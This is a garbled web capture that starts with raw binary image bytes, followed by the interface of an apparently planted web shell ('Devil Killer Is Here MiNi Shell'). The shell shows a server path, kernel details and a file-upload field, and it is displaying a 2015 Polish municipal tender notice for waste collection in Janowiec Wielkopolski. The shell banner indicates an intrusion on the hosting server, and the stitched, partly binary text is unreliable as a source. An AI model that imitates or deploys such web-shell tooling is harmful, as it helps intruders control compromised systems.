JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150915/240760-N-2015.html

<p class="kh_header"><b>Janowiec Wielkopolski: Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Janowiec Wielkopolski</b><br>
<b>Numer ogłoszenia: 240760 - 2015; data zamieszczenia: 15.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Janowiec Wielkopolski , ul. Gnieźnieńska 3, 88-430 Janowiec Wielkopolski, woj. kujawsko-pomorskie, tel. 052 3023034, faks 052 3023020.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um-janowiecwlkp.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Janowiec Wielkopolski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Usługa polega na odbiorze i zagospodarowaniu odpadów komunalnych zmieszanych i zbieranych selektywnie z nieruchomości  położonych na terenie gminy Janowiec Wielkopolski   w tym:
1)	odbieranie i zagospodarowanie odpadów komunalnych z nieruchomości na których zamieszkują mieszkańcy;
2)	odbieranie i zagospodarowanie odpadów komunalnych z nieruchomości na których nie zamieszkują mieszkańcy;

2.	Wykonawca podczas realizacji zamówienia zobowiązany jest:
1)	  przekazywać  odebrane  od  właścicieli  nieruchomości zmieszane  odpady  komunalne, odpady zielone  oraz  pozostałości  z  sortowania odpadów przeznaczonych  do  składowania  do  regionalnej  instalacji do  przetwarzania  odpadów  komunalnych (RIPOK) zlokalizowanej w regionie gospodarki odpadami komunalnymi w województwie kujawsko-pomorskim, zgodnie z Wojewódzkim Planem Gospodarki Odpadami, tj. do regionu  5 bydgoskiego.

2)	  w przypadku frakcji odpadów selektywnie zebranych w ramach zagospodarowania odpadów, Wykonawca zobowiązany będzie do ich przekazania do instalacji odzysku  unieszkodliwiana, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 i 18 ustawy z 14 grudnia 2012 r. o odpadach.

3)	 podczas realizacji zamówienia Wykonawca zapewni osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych, tj.: papier, szkło, metal, tworzywa sztuczne, opakowania wielomateriałowe, zgodnie z art. 3b ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. poz. 391 ze zm.) oraz rozporządzeniem Ministra Środowiska z dnia 29 maja 2012r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. poz. 645). Rozliczenie z ilości i rodzaju odpadów odbywać się będzie w oparciu o dokumenty, o których mowa w rozporządzeniu Ministra Środowiska z dnia 8 grudnia 2010r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. Nr 249, poz. 1673). 

4)	  wykonawca zapewni ograniczenie masy opadów ulegających biodegradacji przekazywanych do składowania w poszczególnych latach, w ilościach wymaganych rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów  ograniczenia  masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów. ( Dz.  U. 2012. 676).

Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do specyfikacji istotnych warunków zamówienia.


3. Rodzaje odpadów odbieranych  z nieruchomości: 
1)   Komunalne odpady zmieszane - 20 01 03; 20 01 99; 
 2)  Papier i tektura - 15 01 01;   20 01 01; 
 3)  Metale - 15 01 04; 20 01 40
4)  Tworzywa sztuczne -  15 01 02;  20 01 39
5)   Szkło 15 01 07; 20 01 02
6)	Opakowania wielomateriałowe 15 01 05 ; 15 01 06; 
7)	Odpady komunalne zielone    20 01 08 ; 20 02 01; 15 01 01

4. Sposób i częstotliwość odbioru odpadów komunalnych  z nieruchomości:
1)	z obszarów o zabudowie jednorodzinnej, letniskowej  i wielorodzinnej do siedmiu lokali: 

a)	pojemniki-  niesegregowane (zmieszane) odpady  w ilości do 60 l/mieszkańca -  raz na miesiąc,   a  w  okresie od 1 listopada  do 31 marca  każdego roku -   raz na dwa tygodnie, 

b)	 worki -  papier i tekturę ( w każdej ilości) -   raz na kwartał,

 c)  worki - na szkło i a  tworzywa sztuczne ( w każdej ilości) -   raz  na  miesiąc,
2) z obszarów  o zabudowie  wielorodzinnej  powyżej siedmiu lokali:
  a) pojemniki-  niesegregowane (zmieszane) odpady  w ilości do 60 l/mieszkańca na  miesiąc -   raz na tydzień;

         b) pojemniki -papier i tektura ( w każdej ilości) -  raz na dwa miesiące,
        
 c) pojemniki- szkło oraz pojemniki na tworzywa sztuczne (w każdej ilości) -  raz na dwa tygodnie;

3)	z terenów nieruchomości, na których nie zamieszkują mieszkańcy, a powstają odpady komunalne:

a)	pojemniki - niesegregowane (zmieszane) odpady komunalne w ilości określonej w rozdziale 3 Regulaminu utrzymania czystości i porządku na terenie gminy Janowiec Wielkopolski -  raz na miesiąc, a w okresie od 1 listopada do 31 marca, według potrzeb właściciela danej nieruchomości - raz na dwa tygodnie;

b)	pojemniki - niesegregowane (zmieszane) odpady komunalne  w placówkach o całodobowym przebywaniu osób ( dom dziecka, dom pomocy społecznej) - raz na dwa tygodnie;

c)	pojemniki - niesegregowane (zmieszane) odpady komunalne z terenu cmentarzy - raz na miesiąc - a w okresie około świątecznym według potrzeb; 

d)	pojemniki lub worki - papier i tektura ( w każdej ilości) -  raz na  dwa miesiące;

e) pojemniki lub worki  - szkło oraz  tworzywa sztuczne, metale i opakowania wielomateriałowe (w każdej ilości) -  raz na miesiąc;

    5. Informacje ogólne o systemie zbierania odpadów komunalnych.

         Gminę Janowiec Wielkopolski  zamieszkuje ok. 8 250 mieszkańców, 
         powierzchnia Gminy: 13.046 ha  

          W skład Gminy Janowiec Wielkopolski wchodzi miasto i sołectwa: Bielawy, Brudzyń, Chrzanowo, Flantrowo, Gącz, Janowiec Wieś, Juncewo, Kołdrąb, Laskowo, Miniszewo, Sarbinowo Drugie, Obiecanowo, Ośno, Posługowo, Świątkowo, Tonowo, Wełna, Włoszanowo, Wybranowo, Zrazim, Żerniki, Żużoły.


     6. Na terenie gminy  odpady komunalne na nieruchomościach  gromadzone są następująco:

- odpady komunalne zmieszane - gromadzone w pojemnikach o pojemności 60 l, 110 l-120 l,  240 l,  660 l, 1100 l  oraz  kontener   7,3 m3;
      - papier i tektura - worki koloru niebieskiego  o poj. 120 l   lub pojemniki  z napisem    -Papier

     - tworzywa sztuczne, metal oraz opakowania wielomateriałowe - worki koloru żółtego  o poj. 120 l   lub pojemniki z napisem  -Tworzywa sztuczne
   
      -  szkło - worki koloru zielonego o pojemności 120 l lub pojemniki z napisem -Szkło

       Pojemniki do odpadów zmieszanych oraz pojemniki do selektywnej zbiórki zapewnia  właściciel każdej nieruchomości.  Worki  do selektywnej zbiórki odpadów komunalnych zapewnia wykonawca. Wykonawca, jeżeli to będzie wynikało z procesu technologicznego odbioru odpadów i segregacji przez wykonawcę selektywnie zbieranych odpadów,  może wprowadzić we własnym zakresie  dodatkowo worki na oddzielne zbieranie szkła oraz worki na tworzywa sztuczne, metal oraz opakowania wielomateriałowe.  Odbiór  worków  ze szkłem i tworzywami sztucznymi  musi odbywać się w jednym terminie.                                                                                                                                                                                                                                                   

8. Według sprawozdania Burmistrza Janowca Wielkopolskiego z realizacji zadań z zakresu gospodarowania odpadami komunalnymi w 2012 r. - 2014 r.    odebrano n/w  ilość  odpadów:

w     2014 roku  
 --    odpadów  komunalnych zmieszanych (kod; 20 03 01) -      1 675,5  Mg

  -   selektywnie odebranych : opakowania z papieru i tektury  (kod; 15 01 01 )   -  8,2 Mg
                                               opakowania z tworzyw sztucznych  (kod 15 01 02 ) -  85,0  Mg
                                                    opakowania ze szkła (kod 15 01 07 )     -  126,2  Mg

w  2013 roku  
--    odpadów  komunalnych zmieszanych (kod; 20 03 01)- 1 612,28  Mg

 -   selektywnie odebranych : opakowania z papieru i tektury  (kod; 15 01 01 )      -  12,19 Mg
                                               opakowania z tworzyw sztucznych  (kod 15 01 02 ) -  58,08  Mg
                                                    opakowania ze szkła (kod 15 01 07 )     -  71,94  Mg

 w 2012 roku:
-    odpadów  komunalnych zmieszanych ( kod;20 03 01)- 1 477,90 Mg

 -   selektywnie odebranych : opakowania z papieru i tektury  (kod; 15 01 01 )      -  2,1 Mg
                                               opakowania z tworzyw sztucznych  (kod 15 01 02 ) - 54,2 Mg
                                                    opakowania ze szkła (kod 15 01 07 )     - 104,2 Mg.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający   przewiduje  udzielenia  zamówienia uzupełniającego o których mowa w art. 67 ust. 1 pkt 6 ustawy prawo zamówień publicznych,
polegającego na powtórzeniu tego samego rodzaju zamówień tj. wywozu zmieszanych i selektywnie zbieranych odpadów komunalnych z terenu Gminy Janowiec Wielkopolski w tym odpadów zbieranych selektywnie z PSZOK tj.  odpady zielone; chemikalia; zużyte baterie i akumulatory;  meble i inne odpady wielkogabarytowe; odpady budowlane i rozbiórkowe; zużyte opony; oraz przeterminowane leki z 3 aptek na terenie miasta. Wykonawca w ramach zamówienia uzupełniającego do opróżniania zbieranych selektywnie odpadów z PSZOK udostępni 3 kontenery typu KP-7 .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.51.32.00-8, 90.50.00.00-2, 90.51.40.00-3, 90.51.20.00-9, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca będzie posiadał aktualne zaświadczenie o wpisie do rejestru działalności regulowanej prowadzonej przez Burmistrza Janowca Wielkopolskiego.   

Ocena spełniania warunku zostanie dokonana na podstawie przedłożonych przez wykonawcę dokumentów o których mowa w rozdziale 6 punkt 6.5.1 specyfikacji - na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że wykonał   a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie  ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz  z podaniem  ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie    - według formularza nr 3; 
        
       Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , wykonał lub wykonuje minimum  jedną usługę polegającą na odbiorze stałych odpadów komunalnych z nieruchomości  w  ilości nie mniejszej niż  1000 Mg/rok.    

Ocena spełniania warunku zostanie dokonana na podstawie przedłożonych przez wykonawcę dokumentów o których mowa w rozdziale 6 punkt 6.5.2 specyfikacji - na zasadzie: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca:
a)	będzie posiadał bazę magazynowo -transportową usytuowaną na terenie gminy Janowiec Wielkopolski lub w odległości nie większej niż 60 km od granic gminy, do którego Wykonawca posiada tytuł prawny.


W zakresie wyposażenia bazy magazynowo - transportowej należy zapewnić:  teren bazy musi być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym; miejsce do parkowania pojazdów powinno być zabezpieczone przed emisją zanieczyszczeń do gruntu;  na terenie bazy muszą być  miejsca do magazynowania selektywnie zbieranych odpadów komunalnych zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działanie czynników atmosferycznych;   teren bazy musi być wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy, zgodnie z wymaganiami określonymi w przepisach ustawy Prawo wodne.


 Wyposażenie bazy magazynowo - transportowej powinno obejmować: miejsca przeznaczone do parkowania pojazdów;  pomieszczenie socjalne dla pracowników odpowiadające liczbie  zatrudnionych osób;  miejsca do magazynowania selektywnie zbieranych odpadów komunalnych;  legalizowaną samochodową wagę najazdową - w przypadku, gdy na terenie bazy następuje magazynowanie odpadów.

 Na terenie bazy powinny znajdować się także: punkt bieżącej konserwacji i naprawy pojazdów;   miejsca do mycia i dezynfekcji pojazdów (o ile czynności te nie będą wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy).

b)	będzie posiadał co najmniej:

- dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych, w tym pojazd  do odbioru odpadów  z  pojemników 60 l, 110 l-120 l,   240 l,  660 l, 1100 l, 
     
     - dwa pojazdy przystosowane do odbierania selektywnie zbieranych odpadów komunalnych  w tym jeden wyposażony w system HDS,
        
Pojazdy   muszą być trwale i czytelnie oznakowane w widocznym miejscu nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości. Muszą posiadać konstrukcję zabezpieczającą przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizującą oddziaływanie czynników atmosferycznych na odpady.

 Pojazdy muszą być wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz czujników zapisujących dane o miejscach wyładunku odpadów umożliwiających weryfikację tych danych przez Zamawiającego. 

Pojazdy muszą być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników.
 
Pojazdy oraz baza magazynowo - transportowa winny spełniać warunki wynikające z rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości  ( Dz. U. 2013.122).  
	
      Ocena spełniania warunku zostanie dokonana na podstawie przedłożonych przez wykonawcę dokumentów o których mowa w rozdziale 6 punkt 6.5.3 specyfikacji - na zasadzie : spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków -  uzna warunek za spełniony na podstawie oświadczenia, złożonego przez wykonawcę   zgodnie z treścią formularza nr 2 do SIWZ -  na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony, jeżeli wykonawca wykaże że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności obejmującej przedmiot zamówienia na kwotę minimum 300.000,00 zł.

Ocena spełniania warunku zostanie dokonana na podstawie przedłożonych przez wykonawcę     dokumentów o których mowa w rozdziale 6 punkt 6.5.4. specyfikacji - na zasadzie: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oferta według formularza 1;zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów do realizacji zamówienia publicznego ( według formularza 2A) - jeśli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - dodatkowy odbiór odpadów z PSZOK - 10</li>
<li>3 - termin płatności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
